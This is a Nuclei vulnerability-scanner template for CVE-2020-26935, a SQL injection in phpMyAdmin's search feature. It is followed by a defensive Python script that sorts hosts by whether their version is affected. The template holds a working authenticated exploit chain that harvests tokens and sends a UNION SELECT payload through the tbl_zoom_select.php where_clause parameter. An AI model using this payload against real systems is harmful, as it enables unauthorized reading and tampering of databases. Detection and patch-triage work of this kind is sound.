id: CVE-2020-26935

info:
  name: phpMyAdmin < 5.0.3 - SQL Injection
  author: 0x_Akoko
  severity: critical
  description: |
    phpMyAdmin before 4.9.6 and 5.x before 5.0.3 contains a SQL injection caused by improper processing of SQL statements in the search feature. An authenticated user who submits crafted search input can inject arbitrary SQL into the query phpMyAdmin runs against the backing database server.
  impact: |
    Attackers can execute arbitrary SQL commands, potentially leading to data theft, modification, or deletion.
  remediation: |
    Update to phpMyAdmin 4.9.6 or 5.0.3, or the latest version.
  reference:
    - https://www.phpmyadmin.net/security/PMASA-2020-6/
    - https://github.com/phpmyadmin/phpmyadmin/commit/d09ab9bc9d634ad08b866d42bb8c4109869d38d2
    - https://nvd.nist.gov/vuln/detail/CVE-2020-26935
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2020-26935
    epss-score: 0.89641
    epss-percentile: 0.9958
    cwe-id: CWE-89
  metadata:
    verified: true
    max-request: 4
    shodan-query: http.title:"phpMyAdmin"
    fofa-query: app="phpMyAdmin"
  tags: cve,cve2020,phpmyadmin,sqli,authenticated

flow: http(1) && http(2) && http(3) && http(4)

http:
  # Request 1: fetch the login page and harvest the CSRF token and session id.
  - raw:
      - |
        GET / HTTP/1.1
        Host: {{Hostname}}

    matchers:
      - type: dsl
        dsl:
          - status_code == 200
          - contains_all(body, "phpMyAdmin", "name=\"token\"")
        condition: and
        internal: true

    extractors:
      - type: regex
        name: token
        part: body
        group: 1
        regex:
          - 'name="token" value="([^"]+)"'
        internal: true

      - type: regex
        name: set_session
        part: body
        group: 1
        regex:
          - 'name="set_session" value="([^"]+)"'
        internal: true

  # Request 2: authenticate with the supplied credentials ({{username}} / {{password}} are template variables).
  - raw:
      - |
        POST /index.php HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        pma_username={{username}}&pma_password={{password}}&server=1&target=index.php&token={{token}}&set_session={{set_session}}

    matchers:
      - type: dsl
        dsl:
          - status_code == 302
          - contains(header, "pmaAuth-1=")
        condition: and
        internal: true

  # Request 3: confirm the session is logged in and collect the post-login token.
  - raw:
      - |
        GET /index.php HTTP/1.1
        Host: {{Hostname}}

    matchers:
      - type: dsl
        dsl:
          - status_code == 200
          - contains(body, "logged_in:true")
        condition: and
        internal: true

    extractors:
      - type: regex
        name: token2
        part: body
        group: 1
        regex:
          - 'token:"([^"]+)"'
        internal: true

  # Request 4: inject through the zoom-search where_clause parameter.
  - raw:
      - |
        POST /tbl_zoom_select.php HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded
        X-Requested-With: XMLHttpRequest

        db=testdb&table=users&where_clause=1=0 UNION SELECT 1,CONCAT(USER(),0x3a,DATABASE(),0x3a,VERSION()),3-- -&where_clause_sign=&token={{token2}}&ajax_request=true&get_data_row=true

    matchers:
      - type: dsl
        dsl:
          - status_code == 200
          - contains_all(body, "\"success\":true", "\"row_info\"")
        condition: and

    extractors:
      - type: regex
        name: sqli_data
        part: body
        group: 1
        regex:
          - '"username":"([^"]+)"'
# digest: 4a0a00473045022100fc499567474340846fd1633cde77be357f3d3c310a0a5abe6552f6ae3fa828e70220538713865339bfafa86903f07433056bd57beb4a8103ffe2bdbc67cab423fa93:922c64590222798bb761d5b6d8e72950
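The remediation above names the fixed releases, but nothing on the page checks a deployed version against them. The following is an added Python example, not part of the Nuclei template or of phpMyAdmin, that encodes the affected ranges stated in PMASA-2020-6 (releases before 4.9.6, and 5.x releases before 5.0.3), treats a pre-release suffix such as `5.0.3-dev` as older than the final release because a snapshot may predate the fix, and triages a constructed host inventory. The `host,version` inventory format and the hostnames are assumptions for illustration.

```python
"""Affected-version check for CVE-2020-26935 (PMASA-2020-6).

Added example; not part of the template or of the phpMyAdmin project.
Encodes the advisory's rule: before 4.9.6, and 5.x before 5.0.3, are affected.
"""
import re
from typing import Dict, List, Optional, Tuple

# First fixed release on each supported branch, per the advisory.
FIXED_BRANCHES = {4: (4, 9, 6), 5: (5, 0, 3)}

# major.minor[.patch][-suffix]; the suffix (dev, rc1, beta...) marks a pre-release.
_VERSION_RE = re.compile(r"^(\d+)\.(\d+)(?:\.(\d+))?(?:[-.]?([A-Za-z][\w.]*))?$")


def parse_version(text: str) -> Optional[Tuple[int, int, int, int]]:
    """Return (major, minor, patch, is_final) or None if the string is not a version.

    is_final is 1 for a release and 0 for a pre-release, so plain tuple
    comparison orders "5.0.3-dev" below "5.0.3".
    """
    m = _VERSION_RE.match(text.strip())
    if not m:
        return None
    major, minor, patch, suffix = m.groups()
    return (int(major), int(minor), int(patch or 0), 0 if suffix else 1)


def is_affected(version: str) -> Optional[bool]:
    """True if the version lies inside the advisory's affected ranges.

    Returns None for an unparseable string so that callers cannot silently
    treat an unknown build as patched.
    """
    parsed = parse_version(version)
    if parsed is None:
        return None
    major = parsed[0]
    if major < 4:
        # Branches older than 4.x never received this fix; treat as affected.
        return True
    if major > 5:
        return False
    fixed = FIXED_BRANCHES[major] + (1,)  # the final release of the fixed version
    return parsed < fixed


def triage(inventory: str) -> Dict[str, List[str]]:
    """Sort 'host,version' lines into affected / patched / unknown buckets.

    Blank lines and '#' comments are skipped. The inventory format is an
    assumption made for this example.
    """
    buckets: Dict[str, List[str]] = {"affected": [], "patched": [], "unknown": []}
    for line in inventory.splitlines():
        line = line.strip()
        if not line or line.startswith("#"):
            continue
        host, _, version = line.partition(",")
        verdict = is_affected(version)
        key = "unknown" if verdict is None else ("affected" if verdict else "patched")
        buckets[key].append(host.strip())
    return buckets


# Constructed sample inventory; hostnames and versions are made up for the example.
SAMPLE_INVENTORY = """\
# host,phpmyadmin_version
db-admin-1.example.test,5.0.2
db-admin-2.example.test,5.0.3
legacy-pma.example.test,4.9.5
pma-ci.example.test,5.0.3-dev
pma-unknown.example.test,n/a
"""

if __name__ == "__main__":
    for bucket, hosts in triage(SAMPLE_INVENTORY).items():
        print(f"{bucket}: {', '.join(hosts) or '-'}")
```

The "unknown" bucket is deliberate: a host whose version cannot be read should go back to the asset owner rather than be dropped from the patch list.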